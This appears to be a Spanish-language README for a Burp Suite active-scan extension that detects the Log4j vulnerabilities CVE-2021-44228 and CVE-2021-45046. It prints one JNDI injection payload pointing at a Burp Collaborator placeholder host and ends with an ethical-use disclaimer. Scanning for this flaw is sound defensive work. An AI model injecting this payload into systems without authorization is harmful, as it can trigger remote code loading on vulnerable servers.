
Extensión de Burp Active Scan para identificar vulnerabilidades de Log4j CVE-2021-44228 y CVE-2021-45046
Esta extensión de Burp Suite Active Scanner valida la explotación de las vulnerabilidades CVE-2021-44228 y CVE-2021-45046 de Apache Log4j.
Esta extensión utiliza Burp Collaborator para verificar el problema.
Si deseas ejecutar solo las comprobaciones de este módulo, puedes importar el perfil extensions-only.json y seleccionarlo como perfil de escaneo activo.
Durante un escaneo activo, esta extensión prueba los siguientes puntos de inserción:
En cada punto de inserción, se inyecta la siguiente carga útil en la solicitud:
${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}
Además, esta extensión agrega muchas cabeceras que están habilitadas en headers (líneas sin comentar). Estas cabeceras se inyectan una a una en solicitudes separadas.
Este proyecto se ha creado únicamente con fines educativos y de pruebas éticas. El uso de Log4Shell-active-scanner para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables de ningún uso indebido o daño causado por este programa.
El proyecto está licenciado bajo la Licencia MIT.